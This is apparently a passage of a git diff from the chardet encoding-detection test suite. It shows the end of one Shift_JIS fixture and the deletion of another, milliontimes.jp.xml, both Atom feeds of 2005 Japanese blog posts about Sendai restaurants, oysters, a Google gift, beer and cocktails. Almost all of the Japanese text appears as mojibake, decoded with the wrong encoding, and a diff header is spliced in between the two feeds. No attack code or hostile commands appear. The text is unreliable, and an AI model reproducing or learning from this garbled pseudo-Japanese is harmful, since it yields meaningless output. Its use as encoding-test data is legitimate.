    - -Google‚©‚ח‚ּ”N‰ךף - -2005-12-28T10:01:01Z -2005-12-28T09:57:51Z -tag:www.grebeweb.net,2005:/mt/1.467 -2005-12-28T09:57:51Z -‘O‰ס‚ּƒNƒƒXƒ}ƒXEƒvƒƒ[ƒ“ƒg‚ֹˆר‚«‘±‚«AGoogle‚©‚חƒjƒ…[ƒCƒ„[EƒJ[ƒh‚דֽ... - -Grebeweb - -mt@grebeweb.net - -Ql‚ֶ‚ָ‚יƒT[ƒrƒX - -‘O‰ס‚ּƒNƒƒXƒ}ƒXEƒvƒƒ[ƒ“ƒg‚ֹˆר‚«‘±‚«AGoogle‚©‚חƒjƒ…[ƒCƒ„[EƒJ[ƒh‚דֽ‚«‚‚µ‚½B
    -V”N‚ּˆ¥A‚ׂP‚UƒJ‘ך‚ֵ‘‚¢‚ִ‚ ‚ט‚‚·B
    -”סם‚ֹƒVƒ“ƒvƒ‹‚ָƒJ[ƒh‚ֵ‚·‚×A“ת–{‚ּי‹ֶ‚ֵ‚ֽ‚ ‚‚ט‚ָ‚¢ƒT[ƒrƒXB
    -‰ן׀‚ֹe‹´‚נ‚א‚ֱ‚ִ–ב‚₪‚±‚ֶ‚ּ‰¿’l‚נ’m‚ֱ‚ִ‚¢‚י‚ּ‚ֵ‚µ‚ו‚₪B

    - -

    ‚ A‰ז‘‚ֽ‚ַ‚±‚©‚ז‚»‚ֵ’T‚µ‚ִ‚­‚¾‚³‚¢i־j
    -ד“תAװ‚×o—ˆ‚½‚חƒAƒbƒv‚·‚י‚©‚א‚µ‚ך‚‚¹‚ס‚¯‚ך‚ַB

    ]]> - -
    -
    - -‹ƒ^ƒ“‚ֲ‚­‚ֻ - -2005-12-27T09:47:40Z -2005-12-27T09:44:58Z -tag:www.grebeweb.net,2005:/mt/1.466 -2005-12-27T09:44:58Z -¼“‡‚ֵ‚‚©‚¯‚½H‚׳•¨B ‚R‚O‚O‰~‚­‚ח‚¢‚¾‚ֱ‚½‚©B –¼‘O‚ּ’‚ט‹ƒ^ƒ“‚ֵ‚ֲ‚­‚ֱ‚½‚ֲ‚­... - -Grebeweb - -mt@grebeweb.net - -ט‚ָƒRƒ~ - -¼“‡‚ֵ‚‚©‚¯‚½H‚׳•¨B
    -‚R‚O‚O‰~‚­‚ח‚¢‚¾‚ֱ‚½‚©B
    -–¼‘O‚ּ’‚ט‹ƒ^ƒ“‚ֵ‚ֲ‚­‚ֱ‚½‚ֲ‚­‚ֻ‚ּ—lqB
    -ך‚ֽ‚‚¿‚ּ‚­ˆֹ’B­@—נj‚ּ‹‚­B

    - -

    ”–¡‚µ‚»‚₪‚¾‚ֱ‚½B

    ]]> - -
    -
    - -ו‘ה‚ּ‰ס“]ץi - -2005-12-27T09:44:39Z -2005-12-27T09:41:58Z -tag:www.grebeweb.net,2005:/mt/1.465 -2005-12-27T09:41:58Z -ץiA‚א‚ֶ‚¢¶‹›‚בוD•¨‚ָ‚ּ‚ֵA‹@‰ן‚ׂ ‚י–ˆ‚ֹץi‚נH‚׳‚ִ‚¢‚יB ז“תAו‘ה‚ֹs... - -Grebeweb - -mt@grebeweb.net - -ט‚ָƒRƒ~ - -ץiA‚א‚ֶ‚¢¶‹›‚בוD•¨‚ָ‚ּ‚ֵA‹@‰ן‚ׂ ‚י–ˆ‚ֹץi‚נH‚׳‚ִ‚¢‚יB
    -ז“תAו‘ה‚ֹs‚ֱ‚½‚א‰½“x‚©ץi‚נH‚׳‚½B

    - -

    ‹ֱ‚¢‚½‚ּ‚ֽ‰ס“]ץi‚ּƒƒxƒ‹‚ּ‚‚³B
    -‹Zp‚ֽ‚ֶ‚א‚©‚­Aƒlƒ^‚ּ¿‚ׂ·‚־‚ח‚µ‚¢B
    -—ˆt‚©‚חו‘ה‚ֹ‚·‚‚±‚ֶ‚ֹ‚ָ‚ֱ‚½‚ּ‚ֵA‚ ‚¿‚±‚¿„‚ֱ‚ִ‚‚ז‚₪‚ֶv‚₪B

    ]]> - -
    -
    - -‰f‰זu’j‚½‚¿‚ּ‘ו˜av - -2005-12-30T18:47:50Z -2005-12-25T15:20:04Z -tag:www.grebeweb.net,2005:/mt/1.464 -2005-12-25T15:20:04Z -צ®ƒTƒCƒg‚ֽ‚±‚¿‚חB s‚«‚ֲ‚¯‚ּˆש‚‰®‚³‚ס‚ֵƒ`ƒPƒbƒg‚נ’¸‚¢‚½‚ּ‚ֵAֿ‚ֹs‚ֱ‚ִ‚«‚... - -Grebeweb - -mt@grebeweb.net - -ט‚ָƒRƒ~ - -צ®ƒTƒCƒg‚ֽ‚±‚¿‚חB

    - -

    s‚«‚ֲ‚¯‚ּˆש‚‰®‚³‚ס‚ֵƒ`ƒPƒbƒg‚נ’¸‚¢‚½‚ּ‚ֵAֿ‚ֹs‚ֱ‚ִ‚«‚‚µ‚½B
    -”¼•׋`–±´‚¾‚ֱ‚½‚ּ‚ֵ‚·‚×cB

    - -

    ‚‚¸AƒI[ƒvƒjƒ“ƒOB
    -’†‘÷‚“¶‚³‚ס‚ּ‰‰‚¶‚יu“א“cחv‚ֶ‚¢‚₪–¼‘O‚ֹ”־B
    -CRo±‚ּ‚ ‚י“¯©“¯–¼‚ּl‚נ’m‚ֱ‚ִ‚¢‚½‚½‚B

    - -

    ֽ‹´‚ּ‚b‚f‚ֹ‘־‚·‚יlװ‚ּ‡¬‚בe‚­A‚ ‚‚טת‘ׂ‚¹‚¸‚ֹ©n‚‚½‚ּ‚ֵ‚·‚×”סם‚ֹ‚ז‚¢ל•i‚ֵ‚µ‚½B
    -ƒwƒr[‚ָƒe[ƒ}‚נˆµ‚ֱ‚ִ‚¢‚י‚ּ‚ֵ•¨¦‚­”ז‚ך‚‚·‚×A—י–״‹‚³‚ס‚ּ‰‰‹Z‚ׂ¿‚ו‚ֱ‚ֶ‚ָ‚ c‚ֶv‚ֱ‚½ˆָO‚ֽAה‚«‚ֲ‚¯‚ח‚ך‚יך–‚ב½‚¢B

    - -

    ƒGƒ“ƒfƒBƒ“ƒOƒ[ƒ‹‚ֹ‚ָ‚ֱ‚ִ‚א’Nˆךlָ‚נ—§‚½‚ָ‚©‚ֱ‚½‚ּ‚×”סם‚ֹˆף“IB
    -“ת–{‚ּ‰f‰ז‚ֵ‚ֽ‰‚‚ִ‚ּo±B

    - -

    ‚׋ךט‚ָ•‚ֽ©‚ָ‚¢•‚ׂז‚¢‚©‚אB

    ]]> - -
    -
    - -ץiK—¼“‡i‹{יj - -2005-12-23T18:34:43Z -2005-12-23T18:17:42Z -tag:www.grebeweb.net,2005:/mt/1.463 -2005-12-23T18:17:42Z -‚¨“X‚ּƒTƒCƒg‚ֽ« http://sushikou.hp.infoseek.co.... - -Grebeweb - -mt@grebeweb.net - -ט‚ָƒRƒ~ - -‚¨“X‚ּƒTƒCƒg‚ֽ«
    -http://sushikou.hp.infoseek.co.jp/
    -infoseek‚ָ‚ּ‚×’¿‚µ‚¢‚©‚אB

    - -

    ‚¹‚ֱ‚©‚­C•׃‚ֹs‚ֱ‚½‚ּ‚ֵA‚¨ץi‚נH‚׳‚ז‚₪‚ֶ¾‚₪‚±‚ֶ‚ֵs‚ֱ‚ִ‚«‚‚µ‚½B
    -’•¶‚µ‚½‚ּ‚ֽ“ֱד‚ֹ‚¬‚טB

    - -

    ƒVƒƒƒAƒlƒ^‚ֽ•¶‹ו‚ָ‚µ‚ֵ‚µ‚½B
    -ƒVƒƒƒ‚ֹg‚ם‚ך‚ִ‚¢‚י‚¨|‚׉½‚¾‚ֱ‚½‚ּ‚©A‚¿‚ו‚ֱ‚ֶ‹C‚ֹ‚ָ‚ט‚‚·B
    -‚ט‚ּ—ַ‚¢‚¨|‚ֵ‚µ‚½B

    - -

    ˆ«‚©‚ֱ‚½‚ּ‚ֽA‚ם‚³‚ׁ‚ֶ‹Zp‚ֶ“X‚ּ•µˆֽ‹CcB

    - -

    ‚ם‚³‚ׁ‚ֽ‰½‚נ‚ֲ‚©‚ֱ‚ִ‚¢‚י‚ּ‚ג‚חB
    -s”ּ‚ּƒ`ƒ…[ƒu‚ּ‚ז‚₪‚ָ–¡B
    -‚©‚ט‚ֹ¶‚ם‚³‚ׁ‚¾‚ֶ‚µ‚½‚חA‚¨‚כ‚µ‚©‚½‚׈«‚¢‚ּ‚ֵ‚µ‚ו‚₪B

    - -

    ‹Zp‚ֵ‚·‚×A^‚ָׂ‚ֱ‚ִ‚¢‚‚¹‚סB
    -‚¨‚ֹ‚¬‚ט‚ּ‚ז‚₪‚ָ˜‚³‚ֵ‚µ‚½B

    - -

    “X‚ּ•µˆֽ‹C‚ֽ‚ֻ‚¦EEEB
    -‹q‚ּ–‚ּ‘O‚ֵ”l‚ֵG’k‚·‚י‚ּ‚ֽ‚ַ‚₪‚©‚ֶB

    ]]> - -
    -
    - -Google‚©‚חƒNƒƒXƒ}ƒXEƒvƒƒ[ƒ“ƒgi2j - -2005-12-22T16:11:41Z -2005-12-22T16:05:55Z -tag:www.grebeweb.net,2005:/mt/1.462 -2005-12-22T16:05:55Z -’†g‚ֽ‚t‚r‚aƒnƒuA‚t‚r‚aƒƒ‚ƒAƒ}ƒEƒXA‚t‚r‚aƒ‰ƒCƒgAƒCƒ„ƒzƒ“Eƒ}ƒCƒN‚ֵ‚µ‚½B ... - -Grebeweb - -mt@grebeweb.net - -Gadget - -’†g‚ֽ‚t‚r‚aƒnƒuA‚t‚r‚aƒƒ‚ƒAƒ}ƒEƒXA‚t‚r‚aƒ‰ƒCƒgAƒCƒ„ƒzƒ“Eƒ}ƒCƒN‚ֵ‚µ‚½B
    -װ‚¢ƒ|[ƒ`‚נJ‚¢‚ִ‚‚י‚ֶ‚±‚ס‚ָ´‚¶B

    - -

    P1000438.JPG

    - -

    ֲ•‚ּ^‚אB‚ֱ‚½‚ּ‚ֵ‚·‚×AƒAƒbƒv‚·‚י‚‚ַ‚ֵ‚ֽ‚ָ‚¢‚©‚ָB
    -‹”N‚ּƒ‰ƒWƒI‚ּ•‚בf“G‚ָ‹C‚ׂµ‚‚·‚×A¡‰ס‚ְּ—pˆך•׃“|‚אA‚‚ —ַ‚¢‚©‚ָB

    - -

    ‚‚½—ˆ”N‚א‚א‚ח‚¦‚‚·‚ז‚₪‚ֹi“ל–³“ל–³jB

    ]]> - -
    -
    - -Google‚©‚חƒNƒƒXƒ}ƒXEƒvƒƒ[ƒ“ƒgi1j - -2005-12-23T20:47:13Z -2005-12-22T15:56:08Z -tag:www.grebeweb.net,2005:/mt/1.461 -2005-12-22T15:56:08Z -Google‚©‚חƒNƒƒXƒ}ƒXEƒvƒƒ[ƒ“ƒg‚נ‚¢‚½‚¾‚«‚‚µ‚½B Adsense‚ֵˆך’טˆָ... - -Grebeweb - -mt@grebeweb.net - -Gadget - -Google‚©‚חƒNƒƒXƒ}ƒXEƒvƒƒ[ƒ“ƒg‚נ‚¢‚½‚¾‚«‚‚µ‚½B
    -Adsense‚ֵˆך’טˆָד‚ּ‰v‚נד‚°‚י‚ֶ‚¢‚½‚¾‚¯‚י—lqB
    -מ€‚ֽ1000ƒhƒ‹‚ֶ‚©”Nװ‚P–ƒhƒ‹‚ֶ‚©¾‚ם‚ך‚ִ‚¢‚‚·‚וs–¾B
    -–¢—ˆץ‚ֵץ‚µ‚ִ‚‚½‚חƒGƒ“ƒgƒ‚ׂQ‚µ‚©‚ ‚½‚ח‚ָ‚¢‚µA(‚ ‚ס‹₪ˆח—Lְ‰ן׀ƒuƒƒOB’zמ•סƒtƒ@ƒ“j’´ƒƒA•¨Hi‚ם‚­‚ם‚­B
    -‹”N‚ֽƒlƒ^ƒtƒ‹‚ֵ‚אƒlƒ^‚ֹ‚ָ‚ֱ‚ִ‚¢‚½‚¯‚ך‚ַA¡”N‚ֽ‚‚ָ‚¢‚ָ‚ B
    -©—‚ֶ‚µ‚ִ‚¢‚י‚¾‚¯‚¾‚ֱ‚½‚ט‚µ‚ִcB

    - -

    ” ‚ֽ‚±‚ס‚ָ´‚¶B
    -P1000434.JPG

    - -

    "From your friends at Google"
    -‚ֶ‘‚¢‚ִ‚ ‚י‚ּ‚×—ַ‚¢´‚¶‚ֵ‚·B

    - -

    ” ‚נJ‚¯‚ִ‚‚‚µ‚ו‚₪B
    -P1000436.JPG

    - -

    ‚±‚ס‚ָ‚ּ‚ד‚ֱ‚ִ‚¢‚‚µ‚½B
    -‰ז‘‚ׂ ‚‚ט‚ֹd‚¢‚ּ‚ֵA’†g‚ֽ‚ּƒGƒ“ƒgƒ‚ֵB

    ]]> - -
    -
    - -“ל•”‰®—¼“‡i‹{יj - -2005-12-23T18:16:56Z -2005-12-22T04:03:52Z -tag:www.grebeweb.net,2005:/mt/1.460 -2005-12-22T04:03:52Z -ƒJƒL‚×H‚׳‚½‚­‚ִ¼“‡‚נ•א‚«‰ס‚ֱ‚ִ‚¢‚‚µ‚½B ב‚ּ~‚ֱ‚½‚ּ“ת‚ֵ‚ ‚½‚ט‚ֽ^‚ֱ”’B ... - -Grebeweb - -mt@grebeweb.net - -ט‚ָƒRƒ~ - -ƒJƒL‚×H‚׳‚½‚­‚ִ¼“‡‚נ•א‚«‰ס‚ֱ‚ִ‚¢‚‚µ‚½B
    -ב‚ּ~‚ֱ‚½‚ּ“ת‚ֵ‚ ‚½‚ט‚ֽ^‚ֱ”’B
    -“r’†‚ּנ‰®‚ֵuב‚ּ¼“‡v‚ֶ‚¢‚₪‚¨נ‚נ©‚ֲ‚¯‚ִ־‚ֱ‚ִ‚µ‚‚ֱ‚½‚טB

    - -

    –{“–‚ֽ’n³‹™‹¦‚׃Cƒxƒ“ƒg“I‚ֹJ‚¢‚ִ‚¢‚יƒJƒL¬‰®‚ֵH‚׳‚½‚©‚ֱ‚½‚ּ‚ֵ‚·‚×A•s‰^‚ֹ‚א‚¨‹x‚B
    -‚ג‚‚ָ‚­›‚ּ“‚ט‹‚­‚ֹ‚ ‚י“ל•”‰®‚ײB

    - -

    ¶ƒKƒL‚ֶƒJƒL‚ּkִ‚«‚נ’•¶B
    -‚ ‚ם‚¹‚ִ‚P‚V‚T‚O‰~B
    -kִ‚«‚ֽAC‚ֵ“M‚ך‚½‚ז‚₪‚ָ–¡‚ׂµ‚‚µ‚½B
    -ƒJƒL“ֱ—L‚ּ–¡‚×”סם‚ֹ‹­‚¢‚ּ‚ֵˆך”ף‚¯‚ֽ‚µ‚ָ‚³‚»‚₪B
    -ֲl“I‚ֹ‚ֽ‘ו–‘«‚ָ‚ּ‚ֵ‚·‚¯‚ך‚ַ‚א‚ֻB

    ]]> - -
    -
    - -‹‚½‚סu‚«‚·‚¯v‚i‚qו‘ה‰w“X - -2005-12-23T18:17:03Z -2005-12-21T11:28:04Z -tag:www.grebeweb.net,2005:/mt/1.459 -2005-12-21T11:28:04Z -נ¡‚ּ‹“ק–מ‚©‚חת‘ׂ‚¹‚¸‚ֹs‚ֱ‚½‚¨“XB ו‘ה‰w‚ּ‹ƒ^ƒ“’‚ט‚ֹ‚ ‚ט‚‚·B –¡‚ֽA... - -Grebeweb - -mt@grebeweb.net - -ט‚ָƒRƒ~ - -נ¡‚ּ‹“ק–מ‚©‚חת‘ׂ‚¹‚¸‚ֹs‚ֱ‚½‚¨“XB
    -ו‘ה‰w‚ּ‹ƒ^ƒ“’‚ט‚ֹ‚ ‚ט‚‚·B
    -–¡‚ֽA‚‚ ‚‚ •’B

    - -

    ˆך”װ‚¨‚א‚µ‚כ‚©‚ֱ‚½‚ּ‚ֽA‹““®•sR‚ָ“X’·B
    -ˆם‚ָ‘¬‚³‚ֵ—x‚י‚ז‚₪‚ֹ“ק‚נִ‚¢‚ִ‚¢‚י‚ּ‚ֹA“X‘S‘ּ‚ֹ–‚דֽ‚¢‚ִ‚¢‚יB
    -‚³‚·‚×Aƒvƒ‚¾‚ָ‚ֶ‚¢‚₪d–‚ֵ‚µ‚½B

    ]]> - -
    -
    - -ו‘ה‚©‚«“¿ - -2005-12-21T06:43:06Z -2005-12-21T03:32:39Z -tag:www.grebeweb.net,2005:/mt/1.458 -2005-12-21T03:32:39Z -18“ת‚ּ—[”ׁ‚נH‚׳‚½“XB ו‘ה‚ֵ‚ֽ—L–¼‚ָ‚¨“X‚ח‚µ‚¢B –¡‚ֽA‚‚ ‚‚ B ƒJƒLƒtƒ‰... - -Grebeweb - -mt@grebeweb.net - - - -18“ת‚ּ—[”ׁ‚נH‚׳‚½“XB
    -ו‘ה‚ֵ‚ֽ—L–¼‚ָ‚¨“X‚ח‚µ‚¢B
    -–¡‚ֽA‚‚ ‚‚ B

    - -

    ƒJƒLƒtƒ‰ƒC‚ׂג‚ג•ֿ‚ם‚ֱ‚½ל‚ט•B
    -•’‚ּƒJƒLƒtƒ‰ƒC‚ֶ”ה‚׳‚ִֵ`•ׂב½‚¢B
    -ƒJƒL‚ֶ‚₪‚׃‚נל‚ֱ‚½c‚ט‚נ—g‚°‚ִ‚¢‚י‚ּ‚©H

    - -

    http://www.kakitoku.co.jp/

    ]]> - -
    -
    - -ו‘ה—·s - -2005-12-20T20:08:48Z -2005-12-20T20:07:10Z -tag:www.grebeweb.net,2005:/mt/1.457 -2005-12-20T20:07:10Z -נ“ת‚‚ֵו‘ה‚ֹs‚ֱ‚ִ‚¢‚‚µ‚½B –¼_’s~‚‚ּ‚½‚‚ֹ—\’ט‚׈ך”‘‰„‚ׁ‚ִ”ז˜J¢B ... - -Grebeweb - -mt@grebeweb.net - -G– - -נ“ת‚‚ֵו‘ה‚ֹs‚ֱ‚ִ‚¢‚‚µ‚½B
    -–¼_’s~‚‚ּ‚½‚‚ֹ—\’ט‚׈ך”‘‰„‚ׁ‚ִ”ז˜J¢B
    -׳‚ֽ–¾“תˆָ~‚ּƒGƒ“ƒgƒ‚ֵB

    ]]> - -
    -
    - -
    \ No newline at end of file diff --git a/chardet/tests/SHIFT_JIS/milliontimes.jp.xml b/chardet/tests/SHIFT_JIS/milliontimes.jp.xml deleted file mode 100644 index 26f1583..0000000 --- a/chardet/tests/SHIFT_JIS/milliontimes.jp.xml +++ /dev/null @@ -1,568 +0,0 @@ - - - -ƒRƒ‰ƒ€ - -2005-04-29T02:31:27Z - -tag:www.milliontimes.jp,2005:/column//2 -Movable Type -Copyright (c) 2005, takato - -ƒrƒ‹ƒh‚ֶƒXƒeƒA‚ּˆב‚¢ - -2005-04-29T02:31:27Z -2005-04-24T08:27:52Z -tag:www.milliontimes.jp,2005:/column//2.160 -2005-04-24T08:27:52Z -@ˆ׃O‚ָ—‚ֶ‚µB‚±‚ּˆב‚¢‚נ–¾m‚ֹ‚¢‚¦‚יl‚ֱ‚ְִ‚ֽ­‚ָ‚¢‚ּ‚ֵ‚ֽ‚ָ‚¢‚ֵ‚µ‚ו‚₪‚©B—¼•‚ֶ‚אAƒo[ƒXƒv[ƒ“‚ֵ•X‚נ‚®‚י‚®‚י‰ס‚·‚±‚ֶ‚ֹ‚ֽ•ֿ‚ם‚ט‚ָ‚¢‚ּ‚ֵ‚·‚×Aו‚ָ–“I‚׈ב‚¢‚‚·B ƒXƒeƒAEEE•X‚נg‚ֱ‚ִ‚¨נ‚נ—ג‚ג‚·B‚¨נ‚©‚«¬‚÷‚יB ƒrƒ‹ƒhEEE‚¨נ‚נ... - -takato -http://www.milliontimes.jp/ -info@milliontimes.jp - -220make - -@ˆ׃O‚ָ—‚ֶ‚µB‚±‚ּˆב‚¢‚נ–¾m‚ֹ‚¢‚¦‚יl‚ֱ‚ְִ‚ֽ­‚ָ‚¢‚ּ‚ֵ‚ֽ‚ָ‚¢‚ֵ‚µ‚ו‚₪‚©B—¼•‚ֶ‚אAƒo[ƒXƒv[ƒ“‚ֵ•X‚נ‚®‚י‚®‚י‰ס‚·‚±‚ֶ‚ֹ‚ֽ•ֿ‚ם‚ט‚ָ‚¢‚ּ‚ֵ‚·‚×Aו‚ָ–“I‚׈ב‚¢‚‚·B
    -
    ƒXƒeƒAEEE•X‚נg‚ֱ‚ִ‚¨נ‚נ—ג‚ג‚·B‚¨נ‚©‚«¬‚÷‚יB
    -ƒrƒ‹ƒhEEE‚¨נ‚נ‚©‚«¬‚÷‚יB

    -@‚»‚₪‚ָ‚ס‚ֵ‚·BƒXƒeƒA‚ֹ‚ֽ‚¨נ‚נ—ג‚ג‚·‚ֶ‚¢‚₪‘ו‚«‚ָ–“I‚ׂ ‚ט‚‚·B‚ַ‚¿‚ח‚©‚ֶ‚¢‚₪‚ֶƒVƒFƒCƒN‚ֹ‹‚¢‹Z–@‚ָ‚ס‚ֵ‚·‚ֻB‚»‚µ‚ִA‚»‚ּ‚½‚‚ֹƒ~ƒLƒVƒ“ƒOƒOƒ‰ƒX‚ֶ‚¢‚₪—eם‚נg‚¢‚‚·B‚»‚µ‚ִAƒVƒ‡[ƒgƒOƒ‰ƒX‚ֵˆש‚ƒJƒNƒeƒ‹‚ּ‚±‚ֶ‚ב½‚¢‚ֵ‚·Bƒ}ƒeƒB[ƒj‚ֽ•’‚±‚ּל‚ט•‚ֵל‚ט‚‚·B

    - -

    @‹t‚ֹƒrƒ‹ƒh‚ֽˆש‚ƒOƒ‰ƒX‚ּ’†‚ֹ—¿‚ֶ•X‚נ“‚ךA‚»‚ּ’†‚ֵ‚¨נ‚נ¬‚÷‡‚ם‚¹‚‚·BƒWƒ“ƒgƒjƒbƒNAƒ‚ƒXƒRƒ~ƒ…[ƒ‹‚ָ‚ַ‘½‚­‚ּƒJƒNƒeƒ‹‚ׂ±‚ּל‚ט•‚ֵ‚·B

    - -

    @ƒJƒNƒeƒ‹‚ּל‚ט•‚ֹ‚ֽA‚±‚ּƒrƒ‹ƒhAƒXƒeƒA‚ּ‘¼‚ֹƒVƒFƒCƒNAƒuƒƒ“ƒhiƒuƒƒ“ƒ_[‚נg‚ֱ‚ִ¬‚÷‚יj‚ּ‚S‚ֲ‚ׂ ‚ט‚‚·Bˆך•”ƒƒCƒ“‚גƒVƒƒƒ“ƒpƒ“‚נg‚ֱ‚½‚א‚ּA‰·‚©‚¢ƒJƒNƒeƒ‹‚ָ‚ַ‚ֽ•X‚נ“‚ך‚¸‚ֹƒrƒ‹ƒh‚µ‚‚·B

    - -

    yײ˜Az
    -ƒVƒFƒCƒJ[‚נU‚י——R

    ]]> - -
    -
    - -‘ז‚R‚ּƒr[ƒ‹ - -2005-04-30T10:12:59Z -2005-04-06T03:19:19Z -tag:www.milliontimes.jp,2005:/column//2.58 -2005-04-06T03:19:19Z -@ˆָ‘OAƒr[ƒ‹‚ֶ”­–Aנ‚ֹ‚ֲ‚¢‚ִ‚ֹ‚ֲ‚¢‚ִ‚ֽG‚ך‚‚µ‚½‚×Aֵ‹‘ז‚R‚ּƒr[ƒ‹‚ֶ¾‚₪¾—t‚נ‚ז‚­•·‚­‚ז‚₪‚ֹ‚ָ‚ט‚‚µ‚½‚׈ך‘ּ‚ַ‚ס‚ָ‚א‚ּ‚ָ‚ס‚ֵ‚µ‚ו‚₪B @•–¼‚ֽuƒr[ƒ‹•—ƒAƒ‹ƒR[ƒ‹ˆש—¿v‚ִֶ‚־‚ךƒr[ƒ‹‚ּ–¡‚ֽ‚µ‚ִ‚¢‚י‚¯‚ך‚ַ‚אA´—¿‚׃r[ƒ‹‚ג”­–Aנ‚ֶˆב‚₪ƒr[... - -takato -http://www.milliontimes.jp/ -info@milliontimes.jp - -060beer - -@ˆָ‘OAƒr[ƒ‹‚ֶ”­–Aנ‚ֹ‚ֲ‚¢‚ִ‚ֹ‚ֲ‚¢‚ִ‚ֽG‚ך‚‚µ‚½‚×Aֵ‹‘ז‚R‚ּƒr[ƒ‹‚ֶ¾‚₪¾—t‚נ‚ז‚­•·‚­‚ז‚₪‚ֹ‚ָ‚ט‚‚µ‚½‚׈ך‘ּ‚ַ‚ס‚ָ‚א‚ּ‚ָ‚ס‚ֵ‚µ‚ו‚₪B

    - -

    @•–¼‚ֽuƒr[ƒ‹•—ƒAƒ‹ƒR[ƒ‹ˆש—¿v‚ִֶ‚־‚ךƒr[ƒ‹‚ּ–¡‚ֽ‚µ‚ִ‚¢‚י‚¯‚ך‚ַ‚אA´—¿‚׃r[ƒ‹‚ג”­–Aנ‚ֶˆב‚₪ƒr[ƒ‹‚‚½‚¢‚ָˆש‚•¨‚ֶ‚¢‚₪‚±‚ֶ‚ֵ‚·B“ֱ’¥‚ֽ“ס‚ֲ‚ ‚ט‚‚·Bˆך‚ֲ‚ֵֽ‹א‚׈ְ‚¢‚ֶ‚¢‚₪‚±‚ֶBƒr[ƒ‹‚ּ–ס1^3A”­–Aנ‚ּ–ס1^2‚ֵ‚·B350ml‚ֵ–ס25‰~‚ֵ‚·B‚א‚₪‚׀‚ֶ‚ֲ‚ֽAƒr[ƒ‹‚ֶˆב‚¢FX‚ָ–¡‚ׂ ‚י‚ֶ‚¢‚₪‚±‚ֶ‚ֵ‚·Bƒr[ƒ‹‚ּך‡A–ֱ•¿‚ֽˆב‚ֱ‚ִ‚א—‚½‚ז‚₪‚ָ–¡‚ֹ‚ָ‚ט‚ׂ¿‚ֵ‚·‚×A‘ז‚R‚ּƒr[ƒ‹‚ֽ´—¿‚ג»–@‚ּˆב‚¢‚ג‹ZpvV‚ֹ‚ז‚ֱ‚ִA–ֱ•¿‚׈ב‚₪‚ֶ–¡‚ּˆב‚¢‚א‘ו‚«‚­‚ָ‚ט‚‚·Bˆך”“I‚ֹ‚ֽ‹ך–¡‚נ—}‚¦‚½‚·‚ֱ‚«‚ט–¡‚ּ₪•i‚ב½‚¢‚ֵ‚·B

    - -

    @¡”N‚ּ‰ִ‚ֽ‚¢‚כ‚¢‚כ‚ָם—‚ּu‘ז‚R‚ּƒr[ƒ‹v‚×o‚י‚‚½‚¢‚ֵ‚·‚©‚חA©•ֹׂ‚ ‚ֱ‚½‚א‚ּ‚נ’T‚µ‚ִ‚‚ִ‚ֽ‚¢‚©‚ֵׂ‚µ‚ו‚₪‚©B

    - -

    ¦‚¿‚ָ‚‚ֹƒr[ƒ‹•—–¡ˆש—¿iƒmƒ“ƒAƒ‹ƒR[ƒ‹ƒr[ƒ‹j‚ֶ‚ֽˆב‚¢‚‚·B‚¨װˆב‚¢‚ָ‚«‚ז‚₪B

    - -

    ֵד‚ֹA‚»‚ך‚¼‚ך‚ּ•×—‚נi2005.4.6’©“תV•·’©§‚ז‚טj
    ƒr[ƒ‹@…‚נ‚ּ‚¼‚­”‰ט”ה—¦‚×´—¿‚ּ67“ˆָדB350ml‚ֵּz‚ֽA77.70‰~BuƒX[ƒp[ƒhƒ‰ƒCviƒAƒTƒqj‚×sך‚ּ”¼•×ד‚נ‚µ‚‚יB
    ”­–Aנ@‘וטƒ[ƒJ[‚×”­”„‚µ‚ִ‚¢‚י‚א‚ּ‚ֽ…‚נ‚­”‰ט”ה—¦‚×25%–¢–B350ml‚ֵּz‚ֽ–ס47‰~Bו‚ָ–ֱ•¿‚ֽu’[—םviƒLƒƒ“j‚ָ‚ַB
    ‘ז‚R‚ּƒr[ƒ‹@”‰ט‚ּ‘ד‚ם‚ט‚ֹ‘ו“₪‚ָ‚ַ‚נg‚₪w‚ּ‚ַ‚²‚µ(¶)x(ƒLƒƒ“)AwV¶xiƒAƒTƒqjAwƒhƒ‰ƒtƒgƒƒ“xiƒTƒbƒ|ƒj‚ֽu‚»‚ּ‘¼Gנv‚ֶ‚µ‚ִ•×—‚³‚ךA”­•\נ‚ֹ¬”’o‰t‚נ¬‚÷‚½wƒX[ƒp[ƒuƒ‹[xiƒTƒ“ƒgƒ[j‚ֽuƒƒLƒ…[ƒ‹—v‚ֹ•×—‚³‚ך‚יB‘ּ‚ֶ‚µ‚ִu‘ז‚R‚ּƒr[ƒ‹v‚ִֶ‚־‚ך‚יB350ml‚ֵּz‚ֽ25‰~’צ“xB

    -
    ‚ּ‚ַ‚²‚µi¶j‚ּ‚ַ‚²‚µi¶jiƒLƒƒ“ƒr[ƒ‹j
    V¶iƒAƒTƒqƒr[ƒ‹j
    ƒhƒ‰ƒtƒgƒƒ“ƒhƒ‰ƒtƒgƒƒ“iƒTƒbƒ|ƒƒr[ƒ‹j
    ƒX[ƒp[ƒuƒ‹[ƒX[ƒp[ƒuƒ‹[iƒTƒ“ƒgƒ[j

    ]]> - -
    -
    - -‰f‰זcocktail‚ּƒJƒNƒeƒ‹i”װO•ׂj - -2005-04-17T20:48:47Z -2005-03-28T12:41:26Z -tag:www.milliontimes.jp,2005:/column//2.57 -2005-03-28T12:41:26Z -ƒgƒ€ƒNƒ‹[ƒYו‰‰‚ּuƒJƒNƒeƒ‹v‚ֹo‚ִ‚­‚יƒJƒNƒeƒ‹‚נ‚V‰ס‚ֹ•ׂ¯‚ִ‚²׀‰מ‚µ‚‚·BּAuA PEACEFUL BARv‚ֶ‚¢‚₪ƒTƒCƒg‚ֹז‚ֱ‚ִ‚¢‚‚µ‚½‚×A»ƒTƒCƒg‚ֽ•ֲ½‚³‚ך‚ִ‚¢‚י‚ז‚₪‚ֵ‚·Bƒlƒ^‚־‚ך‚‚‚·‚ּ‚ֵ‚²’ˆ׃‚­‚¾‚³‚¢B @ ”װO•ׂ‚ֵ‚ֽAƒRƒOƒ‰... - -takato -http://www.milliontimes.jp/ -info@milliontimes.jp - -510moviecocktail - -ƒgƒ€ƒNƒ‹[ƒYו‰‰‚ּuƒJƒNƒeƒ‹v‚ֹo‚ִ‚­‚יƒJƒNƒeƒ‹‚נ‚V‰ס‚ֹ•ׂ¯‚ִ‚²׀‰מ‚µ‚‚·BּAuA PEACEFUL 